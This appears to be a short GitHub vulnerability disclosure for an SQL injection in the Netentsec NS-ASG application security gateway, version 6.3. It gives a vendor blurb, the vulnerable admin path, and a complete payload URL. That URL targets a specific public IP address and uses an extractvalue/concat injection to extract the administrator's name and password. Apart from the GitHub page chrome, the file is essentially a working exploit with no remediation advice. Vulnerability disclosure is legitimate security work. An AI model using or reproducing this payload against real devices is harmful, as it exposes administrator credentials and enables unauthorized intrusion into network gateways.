Beijing Wangkang Technology Co., Ltd. is a leading provider of network application management equipment in China, focusing on the latest trend research and analysis in the field of network application management. It provides users with advanced network application management technology, products, and solutions, aiming to help users achieve the goal of "using the internet well" in network management.

There is an SQL injection vulnerability in the Netcom NS-ASG application security gateway. Attackers exploit vulnerabilities to cause harm to servers.

official： https://www.netentsec.com/

version:6.3

Vulnerability Path ：/admin/config_ISCGroupTimePolicy.php

https://1.85.53.53/admin/config_ISCGroupTimePolicy.php?GroupId=1%20and%20extractvalue(0x1,%20concat(0x1,%20(select%20concat(adminname,%200x7e,%20passwd)%20from%20Admin%20limit%201)))

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

NS-ASG-sql-config_ISCGroupTimePolicy.md

NS-ASG-sql-config_ISCGroupTimePolicy.md

Files

NS-ASG-sql-config_ISCGroupTimePolicy.md

Latest commit

History

NS-ASG-sql-config_ISCGroupTimePolicy.md

File metadata and controls